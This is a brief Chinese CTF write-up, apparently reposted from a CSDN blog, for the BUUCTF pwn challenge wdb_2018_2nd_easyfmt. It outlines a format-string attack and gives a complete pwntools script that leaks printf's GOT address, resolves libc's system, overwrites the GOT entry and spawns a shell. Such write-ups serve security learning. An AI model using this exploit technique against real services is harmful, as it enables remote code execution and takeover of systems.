[BUUCTF-pwn]——wdb_2018_2nd_easyfmt
作者:互联网
[BUUCTF-pwn]——wdb_2018_2nd_easyfmt
一个简单的格式化字符串利用问题
- 泄露出got表地址,找到libc基地址
- 寻找system的实际地址
- 将printf_got修改为system的地址
- 写入”/bin/sh"
exploit
from pwn import *
from LibcSearcher import *
context.log_level = "debug"
p = remote('node3.buuoj.cn',25125)
#p = process("./wdb_2018_2nd_easyfmt")
elf = ELF("./wdb_2018_2nd_easyfmt")
printf_got = elf.got["printf"]
payload1 = p32(printf_got) + "%6$s"
p.sendlineafter("repeater?\n",payload1)
p.recv(4)
printf_addr = u32(p.recv(4))
print("printf_addr ---> ",hex(printf_addr))
libc = LibcSearcher("printf", printf_addr)
libcbase = printf_addr - libc.dump("printf")
system = libcbase + libc.dump("system")
payload = fmtstr_payload(6,{printf_got: system})
p.sendline(payload)
p.sendline("/bin/sh\x00")
p.interactive()
标签:wdb,BUUCTF,easyfmt,addr,system,2nd,printf,got 来源: https://blog.csdn.net/Y_peak/article/details/114924318